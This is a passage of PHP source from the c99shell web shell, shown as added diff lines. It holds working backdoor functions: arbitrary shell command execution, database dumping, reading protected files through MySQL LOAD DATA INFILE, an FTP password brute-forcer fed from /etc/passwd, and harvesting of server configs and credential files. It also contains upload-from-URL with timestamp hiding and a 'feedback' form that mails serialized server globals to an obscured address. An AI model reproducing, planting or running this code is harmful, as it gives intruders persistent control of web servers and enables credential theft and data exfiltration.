    "; + } + else + { + $diplay = true; + $set = array(); + $set["sock"] = $sql_sock; + $set["db"] = $sql_db; + $dump_out = "download"; + $set["print"] = 0; + $set["nl2br"] = 0; + $set[""] = 0; + $set["file"] = $dump_file; + $set["add_drop"] = true; + $set["onlytabs"] = array(); + if (!empty($dmptbls)) {$set["onlytabs"] = explode(";",$dmptbls);} + $ret = mysql_dump($set); + if ($sql_dump_download) + { + @ob_clean(); + header("Content-type: application/octet-stream"); + header("Content-length: ".strlen($ret)); + header("Content-disposition: attachment; filename=\"".basename($sql_dump_file)."\";"); + echo $ret; + exit; + } + elseif ($sql_dump_savetofile) + { + $fp = fopen($sql_dump_file,"w"); + if (!$fp) {echo "Dump error! Can't write to \"".htmlspecialchars($sql_dump_file)."\"!";} + else + { + fwrite($fp,$ret); + fclose($fp); + echo "Dumped! Dump has been writed to \"".htmlspecialchars(realpath($sql_dump_file))."\" (".view_size(filesize($sql_dump_file)).")."; + } + } + else {echo "Dump: nothing to do!";} + } + } + if ($diplay) + { + if (!empty($sql_tbl)) + { + if (empty($sql_tbl_act)) {$sql_tbl_act = "browse";} + $count = mysql_query("SELECT COUNT(*) FROM `".$sql_tbl."`;"); + $count_row = mysql_fetch_array($count); + mysql_free_result($count); + $tbl_struct_result = mysql_query("SHOW FIELDS FROM `".$sql_tbl."`;"); + $tbl_struct_fields = array(); + while ($row = mysql_fetch_assoc($tbl_struct_result)) {$tbl_struct_fields[] = $row;} + if ($sql_ls > $sql_le) {$sql_le = $sql_ls + $perpage;} + if (empty($sql_tbl_page)) {$sql_tbl_page = 0;} + if (empty($sql_tbl_ls)) {$sql_tbl_ls = 0;} + if (empty($sql_tbl_le)) {$sql_tbl_le = 30;} + $perpage = $sql_tbl_le - $sql_tbl_ls; + if (!is_numeric($perpage)) {$perpage = 10;} + $numpages = $count_row[0]/$perpage; + $e = explode(" ",$sql_order); + if (count($e) == 2) + { + if ($e[0] == "d") {$asc_desc = "DESC";} + else {$asc_desc = "ASC";} + $v = "ORDER BY `".$e[1]."` ".$asc_desc." "; + } + else {$v = "";} + $query = "SELECT * FROM `".$sql_tbl."` ".$v."LIMIT ".$sql_tbl_ls." , ".$perpage.""; + $result = mysql_query($query) or print(mysql_smarterror()); + echo "
    Table ".htmlspecialchars($sql_tbl)." (".mysql_num_fields($result)." cols and ".$count_row[0]." rows)
    "; + echo "Structure ]   "; + echo "Browse ]   "; + echo "Dump ]   "; + echo "Insert ]   "; + if ($sql_tbl_act == "structure") {echo "

    Coming sooon!";} + if ($sql_tbl_act == "insert") + { + if (!is_array($sql_tbl_insert)) {$sql_tbl_insert = array();} + if (!empty($sql_tbl_insert_radio)) + { + } + else + { + echo "

    Inserting row into table:
    "; + if (!empty($sql_tbl_insert_q)) + { + $sql_query = "SELECT * FROM `".$sql_tbl."`"; + $sql_query .= " WHERE".$sql_tbl_insert_q; + $sql_query .= " LIMIT 1;"; + $result = mysql_query($sql_query,$sql_sock) or print("

    ".mysql_smarterror()); + $values = mysql_fetch_assoc($result); + mysql_free_result($result); + } + else {$values = array();} + echo "
    "; + foreach ($tbl_struct_fields as $field) + { + $name = $field["Field"]; + if (empty($sql_tbl_insert_q)) {$v = "";} + echo ""; + $i++; + } + echo "
    FieldTypeFunctionValue
    ".htmlspecialchars($name)."".$field["Type"]."

    "; + echo "Insert as new row"; + if (!empty($sql_tbl_insert_q)) {echo " or Save"; echo "";} + echo "

    "; + } + } + if ($sql_tbl_act == "browse") + { + $sql_tbl_ls = abs($sql_tbl_ls); + $sql_tbl_le = abs($sql_tbl_le); + echo "
    "; + echo "\"Pages\" "; + $b = 0; + for($i=0;$i<$numpages;$i++) + { + if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "";} + echo $i; + if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "";} + if (($i/30 == round($i/30)) and ($i > 0)) {echo "
    ";} + else {echo " ";} + } + if ($i == 0) {echo "empty";} + echo "
    From:  To:  
    "; + echo "
    "; + echo ""; + echo ""; + for ($i=0;$i"; + if (empty($e[0])) {$e[0] = "a";} + if ($e[1] != $v) {echo "".$v."";} + else {echo "".$v."\"".$m."\"";} + echo ""; + } + echo ""; + echo ""; + while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) + { + echo ""; + $w = ""; + $i = 0; + foreach ($row as $k=>$v) {$name = mysql_field_name($result,$i); $w .= " `".$name."` = '".addslashes($v)."' AND"; $i++;} + if (count($row) > 0) {$w = substr($w,0,strlen($w)-3);} + echo ""; + $i = 0; + foreach ($row as $k=>$v) + { + $v = htmlspecialchars($v); + if ($v == "") {$v = "NULL";} + echo ""; + $i++; + } + echo ""; + echo ""; + } + mysql_free_result($result); + echo "
    Action
    ".$v.""; + echo "\"Delete\" "; + echo "\"Edit\" "; + echo "

     

    "; + } + } + else + { + $result = mysql_query("SHOW TABLE STATUS", $sql_sock); + if (!$result) {echo mysql_smarterror();} + else + { + echo "
    "; + $i = 0; + $tsize = $trows = 0; + while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) + { + $tsize += $row["Data_length"]; + $trows += $row["Rows"]; + $size = view_size($row["Data_length"]); + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + $i++; + } + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo "
    Table
    RowsTypeCreatedModifiedSizeAction
     ".$row["Name"]." ".$row["Rows"]."".$row["Type"]."".$row["Create_time"]."".$row["Update_time"]."".$size." \"Empty\"  \"Drop\" \"Insert\" 
    +
    ".$i." table(s)
    ".$trows."".$row[1]."".$row[10]."".$row[11]."".view_size($tsize)."

     

    "; + mysql_free_result($result); + } + } + } + } + } + else + { + $acts = array("","newdb","serverstatus","servervars","processes","getfile"); + if (in_array($sql_act,$acts)) {?>
    Create new DB:
     
    View File:
     
    "; + if ($sql_act == "newdb") + { + echo ""; + if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!
    ";} + else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".
    Reason:
    ".mysql_smarterror();} + } + if ($sql_act == "serverstatus") + { + $result = mysql_query("SHOW STATUS", $sql_sock); + echo "
    Server-status variables:

    "; + echo ""; + while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "";} + echo "
    NameValue
    ".$row[0]."".$row[1]."
    "; + mysql_free_result($result); + } + if ($sql_act == "servervars") + { + $result = mysql_query("SHOW VARIABLES", $sql_sock); + echo "
    Server variables:

    "; + echo ""; + while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "";} + echo "
    NameValue
    ".$row[0]."".$row[1]."
    "; + mysql_free_result($result); + } + if ($sql_act == "processes") + { + if (!empty($kill)) {$query = "KILL ".$kill.";"; $result = mysql_query($query, $sql_sock); echo "Killing process #".$kill."... ok. he is dead, amen.";} + $result = mysql_query("SHOW PROCESSLIST", $sql_sock); + echo "
    Processes:

    "; + echo ""; + while ($row = mysql_fetch_array($result, MYSQL_NUM)) { echo "";} + echo "
    IDUSERHOSTDBCOMMANDTIMESTATEINFOAction
    ".$row[0]."".$row[1]."".$row[2]."".$row[3]."".$row[4]."".$row[5]."".$row[6]."".$row[7]."Kill
    "; + mysql_free_result($result); + } + if ($sql_act == "getfile") + { + $tmpdb = $sql_login."_tmpdb"; + $select = mysql_select_db($tmpdb); + if (!$select) {mysql_create_db($tmpdb); $select = mysql_select_db($tmpdb); $created = !!$select;} + if ($select) + { + $created = false; + mysql_query("CREATE TABLE `tmp_file` ( `Viewing the file in safe_mode+open_basedir` LONGBLOB NOT NULL );"); + mysql_query("LOAD DATA INFILE \"".addslashes($sql_getfile)."\" INTO TABLE tmp_file"); + $result = mysql_query("SELECT * FROM tmp_file;"); + if (!$result) {echo "Error in reading file (permision denied)!";} + else + { + for ($i=0;$iFile \"".$sql_getfile."\" does not exists or empty!
    ";} + else {echo "File \"".$sql_getfile."\":
    ".nl2br(htmlspecialchars($f))."
    ";} + mysql_free_result($result); + mysql_query("DROP TABLE tmp_file;"); + } + } + mysql_drop_db($tmpdb); //comment it if you want to leave database + } + } + } + } + echo "
    "; + if ($sql_sock) + { + $affected = @mysql_affected_rows($sql_sock); + if ((!is_numeric($affected)) or ($affected < 0)){$affected = 0;} + echo "
    Affected rows: ".$affected."
    "; +} +if ($act == "mkdir") +{ + if ($mkdir != $d) + { + if (file_exists($mkdir)) {echo "Make Dir \"".htmlspecialchars($mkdir)."\": object alredy exists";} + elseif (!mkdir($mkdir)) {echo "Make Dir \"".htmlspecialchars($mkdir)."\": access denied";} + echo "

    "; + } + $act = $dspact = "ls"; +} +if ($act == "ftpquickbrute") +{ + echo "Ftp Quick brute:
    "; + if (!win) {echo "This functions not work in Windows!

    ";} + else + { + function c99ftpbrutecheck($host,$port,$timeout,$login,$pass,$sh,$fqb_onlywithsh) + { + if ($fqb_onlywithsh) {$true = (!in_array($sh,array("/bin/false","/sbin/nologin")));} + else {$true = true;} + if ($true) + { + $sock = @ftp_connect($host,$port,$timeout); + if (@ftp_login($sock,$login,$pass)) + { + echo "Connected to ".$host." with login \"".$login."\" and password \"".$pass."\".
    "; + ob_flush(); + return true; + } + } + } + if (!empty($submit)) + { + if (!is_numeric($fqb_lenght)) {$fqb_lenght = $nixpwdperpage;} + $fp = fopen("/etc/passwd","r"); + if (!$fp) {echo "Can't get /etc/passwd for password-list.";} + else + { + if ($fqb_logging) + { + if ($fqb_logfile) {$fqb_logfp = fopen($fqb_logfile,"w");} + else {$fqb_logfp = false;} + $fqb_log = "FTP Quick Brute (called c99shell v. ".$shver.") started at ".date("d.m.Y H:i:s")."\r\n\r\n"; + if ($fqb_logfile) {fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));} + } + ob_flush(); + $i = $success = 0; + $ftpquick_st = getmicrotime(); + while(!feof($fp)) + { + $str = explode(":",fgets($fp,2048)); + if (c99ftpbrutecheck("localhost",21,1,$str[0],$str[0],$str[6],$fqb_onlywithsh)) + { + echo "Connected to ".getenv("SERVER_NAME")." with login \"".$str[0]."\" and password \"".$str[0]."\"
    "; + $fqb_log .= "Connected to ".getenv("SERVER_NAME")." with login \"".$str[0]."\" and password \"".$str[0]."\", at ".date("d.m.Y H:i:s")."\r\n"; + if ($fqb_logfp) {fseek($fqb_logfp,0); fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));} + $success++; + ob_flush(); + } + if ($i > $fqb_lenght) {break;} + $i++; + } + if ($success == 0) {echo "No success. connections!"; $fqb_log .= "No success. connections!\r\n";} + $ftpquick_t = round(getmicrotime()-$ftpquick_st,4); + echo "
    Done!
    Total time (secs.): ".$ftpquick_t."
    Total connections: ".$i."
    Success.: ".$success."
    Unsuccess.:".($i-$success)."
    Connects per second: ".round($i/$ftpquick_t,2)."
    "; + $fqb_log .= "\r\n------------------------------------------\r\nDone!\r\nTotal time (secs.): ".$ftpquick_t."\r\nTotal connections: ".$i."\r\nSuccess.: ".$success."\r\nUnsuccess.:".($i-$success)."\r\nConnects per second: ".round($i/$ftpquick_t,2)."\r\n"; + if ($fqb_logfp) {fseek($fqb_logfp,0); fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));} + if ($fqb_logemail) {@mail($fqb_logemail,"c99shell v. ".$shver." report",$fqb_log);} + fclose($fqb_logfp); + } + } + else + { + $logfile = $tmpdir_logs."c99sh_ftpquickbrute_".date("d.m.Y_H_i_s").".log"; + $logfile = str_replace("//",DIRECTORY_SEPARATOR,$logfile); + echo "

    Read first:

    Users only with shell? 

    Logging? 
    Logging to file? 
    Logging to e-mail? 

    "; + } + } +} +if ($act == "d") +{ + if (!is_dir($d)) {echo "
    Permision denied!
    ";} + else + { + echo "Directory information:"; + if (!$win) + { + echo "
    Owner/Group "; + $ow = posix_getpwuid(fileowner($d)); + $gr = posix_getgrgid(filegroup($d)); + $row[] = ($ow["name"]?$ow["name"]:fileowner($d))."/".($gr["name"]?$gr["name"]:filegroup($d)); + } + echo "
    Perms".view_perms_color($d)."
    Create time ".date("d/m/Y H:i:s",filectime($d))."
    Access time ".date("d/m/Y H:i:s",fileatime($d))."
    MODIFY time ".date("d/m/Y H:i:s",filemtime($d))."

    "; + } +} +if ($act == "phpinfo") {@ob_clean(); phpinfo(); c99shexit();} +if ($act == "security") +{ + echo "
    Server security information:
    Open base dir: ".$hopenbasedir."
    "; + if (!$win) + { + if ($nixpasswd) + { + if ($nixpasswd == 1) {$nixpasswd = 0;} + echo "*nix /etc/passwd:
    "; + if (!is_numeric($nixpwd_s)) {$nixpwd_s = 0;} + if (!is_numeric($nixpwd_e)) {$nixpwd_e = $nixpwdperpage;} + echo "
    From:  To:  

    "; + $i = $nixpwd_s; + while ($i < $nixpwd_e) + { + $uid = posix_getpwuid($i); + if ($uid) + { + $uid["dir"] = "".$uid["dir"].""; + echo join(":",$uid)."
    "; + } + $i++; + } + } + else {echo "
    Get /etc/passwd
    ";} + } + else + { + $v = $_SERVER["WINDIR"]."\repair\sam"; + if (file_get_contents($v)) {echo "You can't crack winnt passwords(".$v.")
    ";} + else {echo "You can crack winnt passwords. Download, and use lcp.crack+ é.
    ";} + } + if (file_get_contents("/etc/userdomains")) {echo "View cpanel user-domains logs
    ";} + if (file_get_contents("/var/cpanel/accounting.log")) {echo "View cpanel logs
    ";} + if (file_get_contents("/usr/local/apache/conf/httpd.conf")) {echo "Apache configuration (httpd.conf)
    ";} + if (file_get_contents("/etc/httpd.conf")) {echo "Apache configuration (httpd.conf)
    ";} + if (file_get_contents("/etc/syslog.conf")) {echo "Syslog configuration (syslog.conf)
    ";} + if (file_get_contents("/etc/motd")) {echo "Message Of The Day
    ";} + if (file_get_contents("/etc/hosts")) {echo "Hosts
    ";} + function displaysecinfo($name,$value) {if (!empty($value)) {if (!empty($name)) {$name = "".$name." - ";} echo $name.nl2br($value)."
    ";}} + displaysecinfo("OS Version?",myshellexec("cat /proc/version")); + displaysecinfo("Kernel version?",myshellexec("sysctl -a | grep version")); + displaysecinfo("Distrib name",myshellexec("cat /etc/issue.net")); + displaysecinfo("Distrib name (2)",myshellexec("cat /etc/*-realise")); + displaysecinfo("CPU?",myshellexec("cat /proc/cpuinfo")); + displaysecinfo("RAM",myshellexec("free -m")); + displaysecinfo("HDD space",myshellexec("df -h")); + displaysecinfo("List of Attributes",myshellexec("lsattr -a")); + displaysecinfo("Mount options ",myshellexec("cat /etc/fstab")); + displaysecinfo("Is cURL installed?",myshellexec("which curl")); + displaysecinfo("Is lynx installed?",myshellexec("which lynx")); + displaysecinfo("Is links installed?",myshellexec("which links")); + displaysecinfo("Is fetch installed?",myshellexec("which fetch")); + displaysecinfo("Is GET installed?",myshellexec("which GET")); + displaysecinfo("Is perl installed?",myshellexec("which perl")); + displaysecinfo("Where is apache",myshellexec("whereis apache")); + displaysecinfo("Where is perl?",myshellexec("whereis perl")); + displaysecinfo("locate proftpd.conf",myshellexec("locate proftpd.conf")); + displaysecinfo("locate httpd.conf",myshellexec("locate httpd.conf")); + displaysecinfo("locate my.conf",myshellexec("locate my.conf")); + displaysecinfo("locate psybnc.conf",myshellexec("locate psybnc.conf")); +} +if ($act == "mkfile") +{ + if ($mkfile != $d) + { + if (file_exists($mkfile)) {echo "Make File \"".htmlspecialchars($mkfile)."\": object alredy exists";} + elseif (!fopen($mkfile,"w")) {echo "Make File \"".htmlspecialchars($mkfile)."\": access denied";} + else {$act = "f"; $d = dirname($mkfile); if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} $f = basename($mkfile);} + } + else {$act = $dspact = "ls";} +} +if ($act == "encoder") +{ + echo "
    Encoder:
    Input:




    Hashes:
    "; + foreach(array("md5","crypt","sha1","crc32") as $v) + { + echo $v." -
    "; + } + echo "
    Url:

    urlencode - +
    urldecode - +
    Base64:
    base64_encode -
    "; + echo "
    base64_decode - "; + if (base64_encode(base64_decode($encoder_input)) != $encoder_input) {echo "";} + else + { + $debase64 = base64_decode($encoder_input); + $debase64 = str_replace("\0","[0]",$debase64); + $a = explode("\r\n",$debase64); + $rows = count($a); + $debase64 = htmlspecialchars($debase64); + if ($rows == 1) {echo "";} + else {$rows++; echo "";} + echo " ^"; + } + echo "

    Base convertations:
    dec2hex -
    "; +} +if ($act == "fsbuff") +{ + $arr_copy = $sess_data["copy"]; + $arr_cut = $sess_data["cut"]; + $arr = array_merge($arr_copy,$arr_cut); + if (count($arr) == 0) {echo "
    Buffer is empty!
    ";} + else {echo "File-System buffer

    "; $ls_arr = $arr; $disp_fullpath = true; $act = "ls";} +} +if ($act == "selfremove") +{ + if (($submit == $rndcode) and ($submit != "")) + { + if (unlink(__FILE__)) {@ob_clean(); echo "Thanks for using c99shell v.".$shver."!"; c99shexit(); } + else {echo "
    Can't delete ".__FILE__."!
    ";} + } + else + { + if (!empty($rndcode)) {echo "Error: incorrect confimation!";} + $rnd = rand(0,9).rand(0,9).rand(0,9); + echo "
    Self-remove: ".__FILE__."
    Are you sure?
    For confirmation, enter \"".$rnd."\"
     "; + } +} +if ($act == "update") {$ret = c99sh_getupdate(!!$confirmupdate); echo "".$ret.""; if (stristr($ret,"new version")) {echo "

    ";}} +if ($act == "feedback") +{ + $suppmail = base64_decode("Yzk5c2hlbGxAY2N0ZWFtLnJ1"); + if (!empty($submit)) + { + $ticket = substr(md5(microtime()+rand(1,1000)),0,6); + $body = "c99shell v.".$shver." feedback #".$ticket."\nName: ".htmlspecialchars($fdbk_name)."\nE-mail: ".htmlspecialchars($fdbk_email)."\nMessage:\n".htmlspecialchars($fdbk_body)."\n\nIP: ".$REMOTE_ADDR; + if (!empty($fdbk_ref)) + { + $tmp = @ob_get_contents(); + ob_clean(); + phpinfo(); + $phpinfo = base64_encode(ob_get_contents()); + ob_clean(); + echo $tmp; + $body .= "\n"."phpinfo(): ".$phpinfo."\n"."\$GLOBALS=".base64_encode(serialize($GLOBALS))."\n"; + } + mail($suppmail,"c99shell v.".$shver." feedback #".$ticket,$body,"FROM: ".$suppmail); + echo "
    Thanks for your feedback! Your ticket ID: ".$ticket.".
    "; + } + else {echo "
    Feedback or report bug (".str_replace(array("@","."),array("[at]","[dot]"),$suppmail)."):

    Your name:

    Your e-mail:

    Message:


    Attach server-info *

    There are no checking in the form.

    * - strongly recommended, if you report bug, because we need it for bug-fix.

    We understand languages: English, Russian.

    ";} +} +if ($act == "search") +{ + echo "Search in file-system:
    "; + if (empty($search_in)) {$search_in = $d;} + if (empty($search_name)) {$search_name = "(.*)"; $search_name_regexp = 1;} + if (empty($search_text_wwo)) {$search_text_regexp = 0;} + if (!empty($submit)) + { + $found = array(); + $found_d = 0; + $found_f = 0; + $search_i_f = 0; + $search_i_d = 0; + $a = array + ( + "name"=>$search_name, "name_regexp"=>$search_name_regexp, + "text"=>$search_text, "text_regexp"=>$search_text_regxp, + "text_wwo"=>$search_text_wwo, + "text_cs"=>$search_text_cs, + "text_not"=>$search_text_not + ); + $searchtime = getmicrotime(); + $in = array_unique(explode(";",$search_in)); + foreach($in as $v) {c99fsearch($v);} + $searchtime = round(getmicrotime()-$searchtime,4); + if (count($found) == 0) {echo "No files found!";} + else + { + $ls_arr = $found; + $disp_fullpath = true; + $act = "ls"; + } + } + echo "
    + +Search for (file/folder name):   - regexp +
    Search in (explode \";\"): +

    Text:
    +

    - regexp +   - whole words only +   - case sensitive +   - find files NOT containing the text +

    "; + if ($act == "ls") {$dspact = $act; echo "
    Search took ".$searchtime." secs (".$search_i_f." files and ".$search_i_d." folders, ".round(($search_i_f+$search_i_d)/$searchtime,4)." objects per second).

    ";} +} +if ($act == "chmod") +{ + $mode = fileperms($d.$f); + if (!$mode) {echo "Change file-mode with error: can't get current value.";} + else + { + $form = true; + if ($chmod_submit) + { + $octet = "0".base_convert(($chmod_o["r"]?1:0).($chmod_o["w"]?1:0).($chmod_o["x"]?1:0).($chmod_g["r"]?1:0).($chmod_g["w"]?1:0).($chmod_g["x"]?1:0).($chmod_w["r"]?1:0).($chmod_w["w"]?1:0).($chmod_w["x"]?1:0),2,8); + if (chmod($d.$f,$octet)) {$act = "ls"; $form = false; $err = "";} + else {$err = "Can't chmod to ".$octet.".";} + } + if ($form) + { + $perms = parse_perms($mode); + echo "Changing file-mode (".$d.$f."), ".view_perms_color($d.$f)." (".substr(decoct(fileperms($d.$f)),-4,4).")
    ".($err?"Error: ".$err:"")."
    Owner

     Read
     Write
    eXecute
    Group

     Read
     Write
    eXecute
    World

     Read
     Write
    eXecute
    "; + } + } +} +if ($act == "upload") +{ + $uploadmess = ""; + $uploadpath = str_replace("\\",DIRECTORY_SEPARATOR,$uploadpath); + if (empty($uploadpath)) {$uploadpath = $d;} + elseif (substr($uploadpath,-1) != "/") {$uploadpath .= "/";} + if (!empty($submit)) + { + global $HTTP_POST_FILES; + $uploadfile = $HTTP_POST_FILES["uploadfile"]; + if (!empty($uploadfile["tmp_name"])) + { + if (empty($uploadfilename)) {$destin = $uploadfile["name"];} + else {$destin = $userfilename;} + if (!move_uploaded_file($uploadfile["tmp_name"],$uploadpath.$destin)) {$uploadmess .= "Error uploading file ".$uploadfile["name"]." (can't copy \"".$uploadfile["tmp_name"]."\" to \"".$uploadpath.$destin."\"!
    ";} + } + elseif (!empty($uploadurl)) + { + if (!empty($uploadfilename)) {$destin = $uploadfilename;} + else + { + $destin = explode("/",$destin); + $destin = $destin[count($destin)-1]; + if (empty($destin)) + { + $i = 0; + $b = ""; + while(file_exists($uploadpath.$destin)) {if ($i > 0) {$b = "_".$i;} $destin = "index".$b.".html"; $i++;}} + } + if ((!eregi("http://",$uploadurl)) and (!eregi("https://",$uploadurl)) and (!eregi("ftp://",$uploadurl))) {echo "Incorect url!
    ";} + else + { + $st = getmicrotime(); + $content = @file_get_contents($uploadurl); + $dt = round(getmicrotime()-$st,4); + if (!$content) {$uploadmess .= "Can't download file!
    ";} + else + { + if ($filestealth) {$stat = stat($uploadpath.$destin);} + $fp = fopen($uploadpath.$destin,"w"); + if (!$fp) {$uploadmess .= "Error writing to file ".htmlspecialchars($destin)."!
    ";} + else + { + fwrite($fp,$content,strlen($content)); + fclose($fp); + if ($filestealth) {touch($uploadpath.$destin,$stat[9],$stat[8]);} + } + } + } + } + } + if ($miniform) + { + echo "".$uploadmess.""; + $act = "ls"; + } + else + { + echo "File upload:
    ".$uploadmess."
    +Select file on your local computer:
                   or
    +Input URL:

    +Save this file dir:

    +File-name (auto-fill):

    + convert file name to lovercase

    + +
    "; + } +} +if ($act == "delete") +{ + $delerr = ""; + foreach ($actbox as $v) + { + $result = false; + $result = fs_rmobj($v); + if (!$result) {$delerr .= "Can't delete ".htmlspecialchars($v)."
    ";} + } + if (!empty($delerr)) {echo "Deleting with errors:
    ".$delerr;} + $act = "ls"; +} +if (!$usefsbuff) +{ + if (($act == "paste") or ($act == "copy") or ($act == "cut") or ($act == "unselect")) {echo "
    Sorry, buffer is disabled. For enable, set directive \"\$useFSbuff\" as TRUE.
    ";} +} +else +{ + if ($act == "copy") {$err = ""; $sess_data["copy"] = array_merge($sess_data["copy"],$actbox); c99_sess_put($sess_data); $act = "ls"; } + elseif ($act == "cut") {$sess_data["cut"] = array_merge($sess_data["cut"],$actbox); c99_sess_put($sess_data); $act = "ls";} + elseif ($act == "unselect") {foreach ($sess_data["copy"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["copy"][$k]);}} foreach ($sess_data["cut"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["cut"][$k]);}} c99_sess_put($sess_data); $act = "ls";} + if ($actemptybuff) {$sess_data["copy"] = $sess_data["cut"] = array(); c99_sess_put($sess_data);} + elseif ($actpastebuff) + { + $psterr = ""; + foreach($sess_data["copy"] as $k=>$v) + { + $to = $d.basename($v); + if (!fs_copy_obj($v,$to)) {$psterr .= "Can't copy ".$v." to ".$to."!
    ";} + if ($copy_unset) {unset($sess_data["copy"][$k]);} + } + foreach($sess_data["cut"] as $k=>$v) + { + $to = $d.basename($v); + if (!fs_move_obj($v,$to)) {$psterr .= "Can't move ".$v." to ".$to."!
    ";} + unset($sess_data["cut"][$k]); + } + c99_sess_put($sess_data); + if (!empty($psterr)) {echo "Pasting with errors:
    ".$psterr;} + $act = "ls"; + } + elseif ($actarcbuff) + { + $arcerr = ""; + if (substr($actarcbuff_path,-7,7) == ".tar.gz") {$ext = ".tar.gz";} + else {$ext = ".tar.gz";} + if ($ext == ".tar.gz") {$cmdline = "tar cfzv";} + $cmdline .= " ".$actarcbuff_path; + $objects = array_merge($sess_data["copy"],$sess_data["cut"]); + foreach($objects as $v) + { + $v = str_replace("\\",DIRECTORY_SEPARATOR,$v); + if (substr($v,0,strlen($d)) == $d) {$v = basename($v);} + if (is_dir($v)) + { + if (substr($v,-1) != DIRECTORY_SEPARATOR) {$v .= DIRECTORY_SEPARATOR;} + $v .= "*"; + } + $cmdline .= " ".$v; + } + $tmp = realpath("."); + chdir($d); + $ret = myshellexec($cmdline); + chdir($tmp); + if (empty($ret)) {$arcerr .= "Can't call archivator (".htmlspecialchars(str2mini($cmdline,60)).")!
    ";} + $ret = str_replace("\r\n","\n",$ret); + $ret = explode("\n",$ret); + if ($copy_unset) {foreach($sess_data["copy"] as $k=>$v) {unset($sess_data["copy"][$k]);}} + foreach($sess_data["cut"] as $k=>$v) + { + if (in_array($v,$ret)) {fs_rmobj($v);} + unset($sess_data["cut"][$k]); + } + c99_sess_put($sess_data); + if (!empty($arcerr)) {echo "Archivation errors:
    ".$arcerr;} + $act = "ls"; + } + elseif ($actpastebuff) + { + $psterr = ""; + foreach($sess_data["copy"] as $k=>$v) + { + $to = $d.basename($v); + if (!fs_copy_obj($v,$d)) {$psterr .= "Can't copy ".$v." to ".$to."!
    ";} + if ($copy_unset) {unset($sess_data["copy"][$k]);} + } + foreach($sess_data["cut"] as $k=>$v) + { + $to = $d.basename($v); + if (!fs_move_obj($v,$d)) {$psterr .= "Can't move ".$v." to ".$to."!
    ";} + unset($sess_data["cut"][$k]); + } + c99_sess_put($sess_data); + if (!empty($psterr)) {echo "Pasting with errors:
    ".$psterr;} + $act = "ls"; + } +} +if ($act == "cmd") +{ +if (trim($cmd) == "ps -aux") {$act = "processes";} +elseif (trim($cmd) == "tasklist") {$act = "processes";} +else +{ + @chdir($chdir); + if (!empty($submit)) + { + echo "Result of execution this command:
    "; + $olddir = realpath("."); + @chdir($d); + $ret = myshellexec($cmd); + $ret = convert_cyr_string($ret,"d","w"); + if ($cmd_txt) + { + $rows = count(explode("\r\n",$ret))+1; + if ($rows < 10) {$rows = 10;} + echo "
    "; + } + else {echo $ret."
    ";} + @chdir($olddir); + } + else {echo "Execution command"; if (empty($cmd_txt)) {$cmd_txt = true;}} + echo "


     Display in text-area 
    "; +} +} +if ($act == "ls") +{ + if (count($ls_arr) > 0) {$list = $ls_arr;} + else + { + $list = array(); + if ($h = @opendir($d)) + { + while (($o = readdir($h)) !== false) {$list[] = $d.$o;} + closedir($h); + } + else {} + } + if (count($list) == 0) {echo "
    Can't open folder (".htmlspecialchars($d).")!
    ";} + else + { + //Building array + $objects = array(); + $vd = "f"; //Viewing mode + if ($vd == "f") + { + $objects["head"] = array(); + $objects["folders"] = array(); + $objects["links"] = array(); + $objects["files"] = array(); + foreach ($list as $v) + { + $o = basename($v); + $row = array(); + if ($o == ".") {$row[] = $d.$o; $row[] = "LINK";} + elseif ($o == "..") {$row[] = $d.$o; $row[] = "LINK";} + elseif (is_dir($v)) + { + if (is_link($v)) {$type = "LINK";} + else {$type = "DIR";} + $row[] = $v; + $row[] = $type; + } + elseif(is_file($v)) {$row[] = $v; $row[] = filesize($v);} + $row[] = filemtime($v); + if (!$win) + { + $ow = posix_getpwuid(fileowner($v)); + $gr = posix_getgrgid(filegroup($v)); + $row[] = ($ow["name"]?$ow["name"]:fileowner($v))."/".($gr["name"]?$gr["name"]:filegroup($v)); + } + $row[] = fileperms($v); + if (($o == ".") or ($o == "..")) {$objects["head"][] = $row;} + elseif (is_link($v)) {$objects["links"][] = $row;} + elseif (is_dir($v)) {$objects["folders"][] = $row;} + elseif (is_file($v)) {$objects["files"][] = $row;} + $i++; + } + $row = array(); + $row[] = "Name"; + $row[] = "Size"; + $row[] = "Modify"; + if (!$win) + {$row[] = "Owner/Group";} + $row[] = "Perms"; + $row[] = "Action"; + $parsesort = parsesort($sort); + $sort = $parsesort[0].$parsesort[1]; + $k = $parsesort[0]; + if ($parsesort[1] != "a") {$parsesort[1] = "d";} + $y = ""; + $y .= "\"".($parsesort[1]"; + $row[$k] .= $y; + for($i=0;$i".$row[$i]."";} + } + $v = $parsesort[0]; + usort($objects["folders"], "tabsort"); + usort($objects["links"], "tabsort"); + usort($objects["files"], "tabsort"); + if ($parsesort[1] == "d") + { + $objects["folders"] = array_reverse($objects["folders"]); + $objects["files"] = array_reverse($objects["files"]); + } + $objects = array_merge($objects["head"],$objects["folders"],$objects["links"],$objects["files"]); + $tab = array(); + $tab["cols"] = array($row); + $tab["head"] = array(); + $tab["folders"] = array(); + $tab["links"] = array(); + $tab["files"] = array(); + $i = 0; + foreach ($objects as $a) + { + $v = $a[0]; + $o = basename($v); + $dir = dirname($v); + if ($disp_fullpath) {$disppath = $v;} + else {$disppath = $o;} + $disppath = str2mini($disppath,60); + if (in_array($v,$sess_data["cut"])) {$disppath = "".$disppath."";} + elseif (in_array($v,$sess_data["copy"])) {$disppath = "".$disppath."";} + foreach ($regxp_highlight as $r) + { + if (ereg($r[0],$o)) + { + if ((!is_numeric($r[1])) or ($r[1] > 3)) {$r[1] = 0; ob_clean(); 